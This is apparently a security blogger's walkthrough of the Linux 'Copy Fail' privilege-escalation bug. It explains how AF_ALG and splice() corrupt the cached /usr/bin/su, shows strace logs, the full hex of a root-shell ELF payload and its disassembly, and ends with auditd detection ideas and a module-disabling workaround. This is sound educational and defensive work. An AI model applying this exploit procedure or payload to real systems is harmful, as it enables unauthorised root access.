Side Quest: “Copy Fail”

Join me as I try my hand at dissecting the recent "Copy Fail" (CVE-2026-31431) vulnerability: first how it works, and then what it looks like while running in real time.

Vulnerabilities, aside from the obvious catastrophic consequences, are always fascinating to me. You give an input to an incredibly complex machine, and for some reason the output is something the machine was never supposed to do. It is a puzzle that requires tracing through the machine to understand what happened.

So, I decided to see if I could trace this one myself.

There are already several excellent write-ups on the detections, patching, and broader implications of this attack. My goal here is narrower: to walk through the mechanics slowly enough so that I (and hopefully you) can understand what is occurring in the background.

Background

"Copy Fail" is a Linux local privilege escalation vulnerability. In practical terms, it allows a normal local user to escalate to root under the right kernel conditions. The issue is tracked as CVE-2026-31431 and has been described as a flaw in the Linux kernel's algif_aead user-space crypto interface, reachable through AF_ALG sockets.

In the classical operating-system model, there is userland and there is kernel space. Userland is where ordinary programs run. Kernel space is where the operating system manages memory, files, devices, processes, permissions, and the general machinery of civilization.

That boundary matters because the kernel has authority that normal processes do not. A normal user process cannot simply rewrite /usr/bin/su, change file permissions, or declare itself root. The kernel is supposed to enforce those rules.

But kernels also expose functionality to userland. They have to. Otherwise every program would be trapped in its own padded room, unable to do anything useful. One of those exposed interfaces is AF_ALG, a Linux socket interface that lets userland ask the kernel to perform cryptographic operations.

That is where this vulnerability lives.
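
For a feel of what talking to AF_ALG looks like from userland, here is a minimal and entirely benign sketch. It asks the kernel for a SHA-256 digest through the "hash" interface, not the AEAD interface involved in Copy Fail. The function name kernel_sha256 is my own, and the sketch assumes a Linux kernel where the AF_ALG hash interface is available; anywhere the socket cannot be created or bound, it simply returns None.

```python
import hashlib
import socket


def kernel_sha256(data: bytes):
    """Ask the kernel to hash `data` via AF_ALG; return None if unavailable."""
    try:
        # AF_ALG sockets are bound to (type, name) instead of (host, port).
        with socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0) as alg:
            alg.bind(("hash", "sha256"))
            # accept() hands back the "operation" socket that data is sent to.
            op, _ = alg.accept()
            with op:
                op.sendall(data)
                return op.recv(32)  # a SHA-256 digest is 32 bytes
    except (AttributeError, OSError):
        # Not Linux, or AF_ALG is blocked or disabled on this system.
        return None


if __name__ == "__main__":
    digest = kernel_sha256(b"copy fail")
    if digest is None:
        print("AF_ALG hashing is not available here")
    else:
        # The kernel's answer should match the user-space implementation.
        print(digest.hex(), digest == hashlib.sha256(b"copy fail").digest())
```

The point is only the shape of the conversation: a socket, a bind() that names an algorithm, an accept() that yields an operation socket, and then ordinary send and receive calls.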

Copy Fail involves a specific AEAD crypto path: authencesn(hmac(sha256),cbc(aes)). In normal human terms, this is a kernel crypto operation involving authentication and encryption. The attacker does not particularly care about cryptography here. They care that this specific path has a broken memory-handling behavior.

The bug gives the attacker a controlled 4-byte write into the Linux page cache. Public analyses describe the issue as a chain involving AF_ALG, splice(), and authencesn, where a 4-byte sequence-number-related scratch write lands inside the cached memory backing a readable file.

In Linux, everything is essentially a file (technically a "file descriptor," in case the Linux people come for me). Files are files, sockets are files, terminals are files. The splice() system call moves data between two file descriptors, one of which must be a pipe, without copying that data through user space.

This concept was very difficult for me, but think of it like you would a web server. You have a TCP socket used by an HTTP web server, and you have data that needs to be sent over that socket. splice() lets you move that file-backed data to the socket efficiently, without first copying the requested page into user space.

The difference is that here splice() allows page-cache-backed data from /usr/bin/su to flow into the AF_ALG crypto operation without first becoming an ordinary user-space copy. The crypto path should treat that data as input only. The vulnerability is that, under this specific AEAD path, a 4-byte write lands back in the cached file page.

That last part is the important part: the page cache.

Linux caches file contents in memory. If a file is read or executed, the kernel may keep its contents in RAM so it does not have to go back to disk every time. This is normally boring and good. Performance improves. Everyone goes home happy.

But in this case, the exploit targets the cached contents of a file rather than the file on disk.

The popular target is /usr/bin/su.

Why su? Because it is commonly a setuid-root binary:

-rwsr-xr-x root root /usr/bin/su

Notice the s in the owner execute position. That means setuid. When /usr/bin/su is executed, the kernel starts it with root privileges because the file is owned by root and has the setuid bit set.
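
The same check can be scripted. This is a minimal sketch using Python's os and stat modules; the helper names is_setuid_root and check_path are mine, not part of any tool mentioned here.

```python
import os
import stat


def is_setuid_root(mode: int, uid: int) -> bool:
    """True for a regular file owned by root with the setuid bit set."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID) and uid == 0


def check_path(path: str) -> str:
    """Describe a file the way `ls -l` would, plus a setuid-root verdict."""
    st = os.stat(path)
    verdict = "setuid-root" if is_setuid_root(st.st_mode, st.st_uid) else "not setuid-root"
    return f"{stat.filemode(st.st_mode)} uid={st.st_uid} {path}: {verdict}"


if __name__ == "__main__":
    target = "/usr/bin/su"
    if os.path.exists(target):
        print(check_path(target))
    else:
        print(f"{target} not found on this system")
```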

Normally, that is safe because the real su program then performs authentication. It asks for a password, checks PAM policy, and only gives you a shell if you are allowed to have one.

Copy Fail breaks the arrangement by attacking the cached executable content.

The Exploit

First, the vulnerable crypto path can be turned into a controlled 4-byte page-cache write. This does not mean the attacker opens /usr/bin/su for writing. They do not need write permission. Instead, they use splice() to move page-cache-backed data from /usr/bin/su through a pipe and into an AF_ALG crypto operation. Due to the kernel bug, a 4-byte write that should have stayed inside the crypto operation lands in the cached file page instead.

Second, /usr/bin/su is useful because it already carries the setuid-root privilege metadata. The attacker does not need to create a new privileged file. They temporarily corrupt the in-memory cached contents of a privileged file that already exists.

The exploit carries a tiny Linux executable payload. It is not a full replacement for su. It does not implement password checking or PAM or anything noble like that. It is a very small ELF whose job is essentially:

setuid(0);
execve("/bin/sh", ...);

The exploit writes that tiny ELF into the cached beginning of /usr/bin/su, four bytes at a time.

The process looks roughly like this:

1. Open /usr/bin/su read-only.

2. Decompress the tiny ELF payload embedded in the script.

3. For each 4-byte chunk of that payload:
   - configure the vulnerable AF_ALG crypto operation
   - splice page-cache-backed bytes from /usr/bin/su into the crypto path
   - trigger crypto finalization
   - cause the vulnerable 4-byte write to land at the desired cached file offset

4. Repeat until the front of the cached /usr/bin/su image has been replaced with the tiny ELF.

5. Execute /usr/bin/su.

6. The kernel applies /usr/bin/su’s setuid-root metadata, but loads the poisoned cached executable bytes.

7. The tiny ELF runs as root and launches /bin/sh.

The file on disk does not need to change. The kernel's cached view of the file changes. Thus when the system believes that it is executing /usr/bin/su, and from a metadata perspective it is, the bytes being loaded from the page cache are no longer the real su program.
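
The disk-versus-cache distinction can be shown with a toy model. To be clear, this is a pure in-memory simulation of my own and touches no kernel interface: a bytes object stands in for the file on disk, a bytearray stands in for the cached page, and the "writes" are ordinary Python slice assignments. The two byte strings are the first 24 bytes of the real su header and of the payload, both taken from the dumps in this article.

```python
def overwrite_in_chunks(cache: bytearray, payload: bytes, chunk: int = 4) -> int:
    """Copy `payload` over the start of `cache`, `chunk` bytes per write."""
    writes = 0
    for offset in range(0, len(payload), chunk):
        piece = payload[offset:offset + chunk]
        cache[offset:offset + len(piece)] = piece
        writes += 1
    return writes


# Stand-in for the file on disk: the first 24 bytes of the original su.
on_disk = bytes.fromhex("7f454c46020101000000000000000000" "03003e0001000000")
# Stand-in for the cached page, which starts out as a copy of the disk bytes.
page_cache = bytearray(on_disk)
# The first 24 bytes of the payload.
payload_head = bytes.fromhex("7f454c46020101000000000000000000" "02003e0001000000")

writes = overwrite_in_chunks(page_cache, payload_head)

print("writes needed:", writes)
print("disk  :", on_disk.hex())
print("cache :", page_cache.hex())
print("cache still matches disk:", bytes(page_cache) == on_disk)
```

In this model the disk copy never changes, yet anything that reads through the cache sees the new bytes. That is the whole trick in miniature.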

Exploit in Action

Unlike some PoCs, this one is very easy to find. The GitHub for it is located here. While it is heavily obfuscated, it is simple to execute. Moreover, it does not require any special Python libraries: it uses only os, zlib, and socket, all of which are part of the standard library installed with Python. My first attempt at executing the script (in a secure VM, of course) ended in failure, however. Although I had not updated the Linux kernel, it appeared the vulnerable socket interface had already been disabled. That is not particularly hard to reverse, but it is still an interesting way of blocking the exploit (more on that later).

echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif-aead.conf
rmmod algif_aead 2>/dev/null

Once this pesky safety measure was removed, the Python script executed and I was gifted with a root shell. I have already outlined the theory of the vulnerability, but I wanted to see it actually occur. For this I used the traditional strace method, which let me track the system calls the script made.

Baselines

The hash value at the beginning of this exercise for /usr/bin/su was fa8542e6a4e74c07e3203687cb1fe1cf42bbf2d173b6b157eccb806b5d2e85.
The stat value was:

  File: /usr/bin/su
  Size: 55680      Blocks: 112        IO Block: 4096   regular file
Device: 803h/2051d Inode: 274965      Links: 1
Access: (4755/-rwsr-xr-x)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2026-04-17 06:21:05.000000000 -0500
Modify: 2026-03-06 10:10:04.000000000 -0600
Change: 2026-04-17 06:21:05.932706798 -0500
 Birth: 2026-04-17 06:21:05.882706674 -0500

The first 256 bytes of the binary, as a hex dump, were:

00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000  .ELF............
00000010: 0300 3e00 0100 0000 203f 0000 0000 0000  ..>..... ?......
00000020: 4000 0000 0000 0000 c0d1 0000 0000 0000  @...............
00000030: 0000 0000 4000 3800 0d00 4000 1f00 1e00  ....@.8...@.....
00000040: 0600 0000 0400 0000 4000 0000 0000 0000  ........@.......
00000050: 4000 0000 0000 0000 4000 0000 0000 0000  @.......@.......
00000060: d802 0000 0000 0000 d802 0000 0000 0000  ................
00000070: 0800 0000 0000 0000 0300 0000 0400 0000  ................
00000080: 1803 0000 0000 0000 1803 0000 0000 0000  ................
00000090: 1803 0000 0000 0000 1c00 0000 0000 0000  ................
000000a0: 1c00 0000 0000 0000 0100 0000 0000 0000  ................
000000b0: 0100 0000 0400 0000 0000 0000 0000 0000  ................
000000c0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000000d0: b024 0000 0000 0000 b024 0000 0000 0000  .$.......$......
000000e0: 0010 0000 0000 0000 0100 0000 0500 0000  ................
000000f0: 0030 0000 0000 0000 0030 0000 0000 0000  .0.......0......
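
A baseline like this can also be captured with a few lines of Python. The sketch below is mine (the function names xxd_line, hexdump, and baseline are not from any tool used above) and mimics the layout of the dump shown. One caveat, hedged: an ordinary read goes through the page cache, so a hash taken this way reflects what the kernel has cached, which is exactly why the later dump in this article shows the altered bytes.

```python
import hashlib


def xxd_line(offset: int, chunk: bytes) -> str:
    """Format up to 16 bytes in the same layout as the dump above."""
    hex_part = " ".join(chunk[i:i + 2].hex() for i in range(0, len(chunk), 2))
    text = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
    return f"{offset:08x}: {hex_part:<39}  {text}"


def hexdump(data: bytes) -> str:
    """Hex dump of `data`, 16 bytes per line."""
    return "\n".join(xxd_line(i, data[i:i + 16]) for i in range(0, len(data), 16))


def baseline(path: str, head: int = 256):
    """Return (sha256 hex digest, hex dump of the first `head` bytes)."""
    with open(path, "rb") as f:
        data = f.read()
    return hashlib.sha256(data).hexdigest(), hexdump(data[:head])


if __name__ == "__main__":
    # Demonstrated on this script itself; point it at any readable file.
    digest, dump = baseline(__file__, head=32)
    print(digest)
    print(dump)
```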

Running the Vulnerability

With strace at the ready, it became immediately obvious that the exploit was proceeding as expected. Upon executing the Python script, the setup of the exploit was visible.

# This is the sample loop from the strace logs.

12:18:51.589360 openat(AT_FDCWD, "/usr/bin/su", O_RDONLY|O_CLOEXEC) = 3 <0.000059>
12:18:51.590199 sendmsg(5, {msg_name=NULL, msg_namelen=0, msg_iov=[{iov_base="AAAA\177ELF", iov_len=8}], msg_iovlen=1, msg_control=[{cmsg_len=20, cmsg_level=SOL_ALG, cmsg_type=0x3}, {cmsg_len=36, cmsg_level=SOL_ALG, cmsg_type=0x2}, {cmsg_len=20, cmsg_level=SOL_ALG, cmsg_type=0x4}], msg_controllen=88, msg_flags=0}, MSG_MORE) = 8 <0.000189>
12:18:51.590563 pipe2([6, 7], O_CLOEXEC) = 0 <0.000038>
12:18:51.590667 splice(3, [0], 7, NULL, 4, 0) = 4 <0.000052>
12:18:51.590761 splice(6, NULL, 5, NULL, 4, 0) = 4 <0.000041>

# These are the fd values during the trace.
fd 3 = /usr/bin/su
fd 5 = AF_ALG crypto operation socket
fd 6 = pipe read end
fd 7 = pipe write end

The pattern above repeats once per 4-byte chunk. /usr/bin/su is opened read-only as fd 3. The sendmsg() on fd 5 configures the crypto operation and carries the current piece of the payload: in iov_base="AAAA\177ELF", the AAAA is padding (not relevant per se) and \177ELF is the beginning of the payload, the ELF magic number. The three SOL_ALG control messages (types 0x3, 0x2, and 0x4) correspond to ALG_SET_OP, ALG_SET_IV, and ALG_SET_AEAD_ASSOCLEN in linux/if_alg.h. The first splice() moves 4 bytes from fd 3, starting at file offset 0, into the pipe's write end, fd 7. The second splice() moves those bytes from the pipe's read end, fd 6, into the AF_ALG operation socket, fd 5. Of most importance for us is the sendmsg() followed by the splice() that references fd 3 (/usr/bin/su).

This loop continues, with the iov_base field of each sendmsg() stepping through the payload 4 bytes at a time, until the full malicious payload has been written.
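
Spotting that sequence by eye gets tedious, so here is a rough sketch of how it could be picked out of a saved strace log. The function name and regular expressions are my own and assume the strace output format shown above. It does not track close() or fd reuse, so treat it as a triage aid, not a detector.

```python
import re

OPENAT = re.compile(r'openat\(AT_FDCWD, "([^"]+)", [^)]*\) = (\d+)')
SENDMSG_ALG = re.compile(r"sendmsg\((\d+), .*cmsg_level=SOL_ALG")
PIPE2 = re.compile(r"pipe2\(\[(\d+), (\d+)\]")
SPLICE = re.compile(
    r"splice\((\d+), (?:\[(\d+)\]|NULL), (\d+), (?:\[\d+\]|NULL), (\d+), [^)]*\) = (\d+)"
)


def find_file_to_alg_splices(lines):
    """Return (path, file offset, byte count) for file -> pipe -> AF_ALG chains."""
    files = {}          # fd -> path, from openat()
    alg_fds = set()     # fds that received SOL_ALG control messages
    read_end_of = {}    # pipe write fd -> pipe read fd
    pending = {}        # pipe read fd -> (path, offset, count) waiting in the pipe
    hits = []
    for line in lines:
        if m := OPENAT.search(line):
            files[int(m.group(2))] = m.group(1)
        elif m := SENDMSG_ALG.search(line):
            alg_fds.add(int(m.group(1)))
        elif m := PIPE2.search(line):
            read_end_of[int(m.group(2))] = int(m.group(1))
        elif m := SPLICE.search(line):
            src, dst = int(m.group(1)), int(m.group(3))
            if src in files and dst in read_end_of:
                offset = int(m.group(2)) if m.group(2) is not None else None
                pending[read_end_of[dst]] = (files[src], offset, int(m.group(5)))
            elif src in pending and dst in alg_fds:
                hits.append(pending.pop(src))
    return hits


# The five trace lines from this article, copied verbatim.
SAMPLE = r'''
12:18:51.589360 openat(AT_FDCWD, "/usr/bin/su", O_RDONLY|O_CLOEXEC) = 3 <0.000059>
12:18:51.590199 sendmsg(5, {msg_name=NULL, msg_namelen=0, msg_iov=[{iov_base="AAAA\177ELF", iov_len=8}], msg_iovlen=1, msg_control=[{cmsg_len=20, cmsg_level=SOL_ALG, cmsg_type=0x3}, {cmsg_len=36, cmsg_level=SOL_ALG, cmsg_type=0x2}, {cmsg_len=20, cmsg_level=SOL_ALG, cmsg_type=0x4}], msg_controllen=88, msg_flags=0}, MSG_MORE) = 8 <0.000189>
12:18:51.590563 pipe2([6, 7], O_CLOEXEC) = 0 <0.000038>
12:18:51.590667 splice(3, [0], 7, NULL, 4, 0) = 4 <0.000052>
12:18:51.590761 splice(6, NULL, 5, NULL, 4, 0) = 4 <0.000041>
'''.strip().splitlines()

hits = find_file_to_alg_splices(SAMPLE)
for path, offset, count in hits:
    print(f"{count} bytes of {path} at offset {offset} were spliced into an AF_ALG socket")
```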

You can go deeper into kernel calls, of course. This has been a fascinating crash course in Linux system operations for me, and I had to stop somewhere to get this article out. (Maybe after a week of studying this, my brain was a little fried :).

The payload decoded takes the form:

  7f454c46 02010100 00000000 00000000
  02003e00 01000000 78004000 00000000
  40000000 00000000 00000000 00000000
  00000000 40003800 01000000 00000000
  01000000 05000000 00000000 00000000
  00004000 00000000 00004000 00000000
  9e000000 00000000 9e000000 00000000
  00100000 00000000 31c031ff b0690f05
  488d3d0f 00000031 f66a3b58 990f0531
  ff6a3c58 0f052f62 696e2f73 68000000

Basically, the ELF magic number is the first four bytes: 7f454c46. The actual code begins at 31c031ff, which in assembly takes the form:

  xor eax, eax
  xor edi, edi
  mov al, 0x69        ; setuid(0)
  syscall

  lea rdi, [rip+0xf]  ; "/bin/sh"
  xor esi, esi
  push 0x3b
  pop rax             ; execve
  cdq
  syscall

  xor edi, edi
  push 0x3c
  pop rax             ; exit
  syscall

  "/bin/sh\0"

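This is a fairly simple binary: it calls setuid(0), then executes /bin/sh, and exits if that fails.

The assembly above was reconstructed from the payload bytes seen in the strace logs while running the Python exploit. A hex dump of /usr/bin/su taken afterwards shows that it has been altered by the exploit. The first 160 bytes (offsets 0x00 through 0x9f) now match the payload, and everything from 0xa0 onward is still the original su: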
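
As a cross-check on that reading, the payload's headers can be unpacked with Python's struct module. This is a sketch of my own, assuming the standard little-endian ELF64 layout. The bytes are the decoded payload shown above, and the variable names follow the usual ELF field names.

```python
import struct

PAYLOAD_HEX = """
7f454c46 02010100 00000000 00000000
02003e00 01000000 78004000 00000000
40000000 00000000 00000000 00000000
00000000 40003800 01000000 00000000
01000000 05000000 00000000 00000000
00004000 00000000 00004000 00000000
9e000000 00000000 9e000000 00000000
00100000 00000000 31c031ff b0690f05
488d3d0f 00000031 f66a3b58 990f0531
ff6a3c58 0f052f62 696e2f73 68000000
"""
payload = bytes.fromhex("".join(PAYLOAD_HEX.split()))

# ELF64 header fields that follow the 16-byte e_ident array.
(e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, e_flags,
 e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum,
 e_shstrndx) = struct.unpack_from("<HHIQQQIHHHHHH", payload, 16)

# The single program header, located at e_phoff.
(p_type, p_flags, p_offset, p_vaddr, p_paddr,
 p_filesz, p_memsz, p_align) = struct.unpack_from("<IIQQQQQQ", payload, e_phoff)

# Translate the entry point's virtual address back to a file offset.
entry_offset = e_entry - p_vaddr + p_offset

# The lea instruction (48 8d 3d + 4-byte displacement) sits 8 bytes past the
# entry point and is 7 bytes long; its target is relative to the next
# instruction.
lea_offset = entry_offset + 8
displacement = struct.unpack_from("<i", payload, lea_offset + 3)[0]
target = lea_offset + 7 + displacement

print(f"e_type={e_type} (2 = ET_EXEC), e_machine={e_machine:#x} (0x3e = x86-64)")
print(f"entry {e_entry:#x} -> file offset {entry_offset:#x}")
print(f"segment type={p_type} flags={p_flags} (5 = read + execute), size={p_filesz:#x}")
print(f"lea target {target:#x}: {payload[target:target + 8]!r}")
```

One detail this makes visible: the original su header has 0300 in the e_type position (a position-independent executable), while the payload has 0200 (a fixed-address executable loaded at 0x400000).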

00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000  .ELF............
00000010: 0200 3e00 0100 0000 7800 4000 0000 0000  ..>.....x.@.....
00000020: 4000 0000 0000 0000 0000 0000 0000 0000  @...............
00000030: 0000 0000 4000 3800 0100 0000 0000 0000  ....@.8.........
00000040: 0100 0000 0500 0000 0000 0000 0000 0000  ................
00000050: 0000 4000 0000 0000 0000 4000 0000 0000  ..@.......@.....
00000060: 9e00 0000 0000 0000 9e00 0000 0000 0000  ................
00000070: 0010 0000 0000 0000 31c0 31ff b069 0f05  ........1.1..i..
00000080: 488d 3d0f 0000 0031 f66a 3b58 990f 0531  H.=....1.j;X...1
00000090: ff6a 3c58 0f05 2f62 696e 2f73 6800 0000  .j<X../bin/sh...
000000a0: 1c00 0000 0000 0000 0100 0000 0000 0000  ................
000000b0: 0100 0000 0400 0000 0000 0000 0000 0000  ................
000000c0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000000d0: b024 0000 0000 0000 b024 0000 0000 0000  .$.......$......
000000e0: 0010 0000 0000 0000 0100 0000 0500 0000  ................
000000f0: 0030 0000 0000 0000 0030 0000 0000 0000  .0.......0......

Since this affects only the page cache and not the actual /usr/bin/su on disk, the binary reverts to the original after a restart: the file itself was never changed.

Detection?

From the blue team perspective though, how are these kinds of attacks detected? Obviously strace is not a viable option to run against every executable.

In my day job, Linux security is very often the red-headed stepchild of forensics. Linux forensics is not necessarily harder than Windows forensics, but it is different. Whereas Windows forensics is a warren of unpublished artifacts that researchers have pieced together to reconstruct an incident, much of the story of a Linux incident may live in service logs, shell history, auth logs, audit logs, container runtime logs, or whatever telemetry the system happened to be configured to keep. The key with Linux forensics is very often "if you are lucky."

Software detection on Linux is severely lacking because, most of the time, security software is not placed on systems and log forwarding is not common. This is compounded by the fact that Linux is used across a wide range of environments that simply are not designed for any kind of non-standard installation. Even your thermostat may listen on port 22, and it will likely not allow for even the most lightweight EDR or for shipping syscall logs to a SIEM. This is to say nothing of containerization technology, whose ephemeral nature makes forensics difficult. To paraphrase one researcher: "this attack will be in red team tool chests for a long time".

Perhaps this is pessimistic, but enough time in cybersecurity gives one the sense that this will be a problem for many years to come. Yet, so as not to leave on too much negativity, there are a few things I will be looking for when triaging these systems:

- Use of AF_ALG. The exploit relies heavily on it, and most cryptographic operations happen in user space rather than through this kernel interface. Even the use of this socket should be enough of an indicator to raise eyebrows.
- Use of splice() together with authencesn, which will be another strong indicator.
- An execve("/usr/bin/su") shortly afterwards, which will likely be a good indicator as well.

All of these can be found with auditd, and can even be forwarded to a SIEM for later monitoring.

Finally, as noted above, disabling the algif_aead module (the AEAD piece of the AF_ALG interface) can provide at least a short-term solution to the issue.

echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif-aead.conf
rmmod algif_aead 2>/dev/null
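
To confirm the workaround is actually in place on a host, something like the sketch below could be used. The two helper functions are hypothetical names of mine. They parse the text of /proc/modules and of a modprobe.d file, and the config path is the one used in the commands above. One assumption to flag loudly: a kernel with algif_aead compiled in, as opposed to built as a loadable module, would not appear in /proc/modules and would not be affected by a modprobe rule, so a clean result here is not proof of safety.

```python
def module_loaded(name: str, proc_modules_text: str) -> bool:
    """True if `name` is the first field of any line of /proc/modules text."""
    return any(
        line.split()[0] == name
        for line in proc_modules_text.splitlines()
        if line.strip()
    )


def install_blocked(name: str, modprobe_conf_text: str) -> bool:
    """True if a non-comment line reads `install <name> /bin/false`."""
    for line in modprobe_conf_text.splitlines():
        fields = line.split("#", 1)[0].split()
        if fields[:3] == ["install", name, "/bin/false"]:
            return True
    return False


def read_text(path: str) -> str:
    """Return the file's text, or an empty string if it cannot be read."""
    try:
        with open(path) as f:
            return f.read()
    except OSError:
        return ""


if __name__ == "__main__":
    loaded = module_loaded("algif_aead", read_text("/proc/modules"))
    blocked = install_blocked(
        "algif_aead", read_text("/etc/modprobe.d/disable-algif-aead.conf")
    )
    print("algif_aead currently loaded:", loaded)
    print("algif_aead install blocked :", blocked)
```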

Final Thoughts

This has been an interesting side quest, and it truly has helped me learn a lot about the way the Linux kernel works (more than I would expect from a small Python script). Without a doubt, this will continue to be a problem. At the very least, I hope you, reader, found it interesting.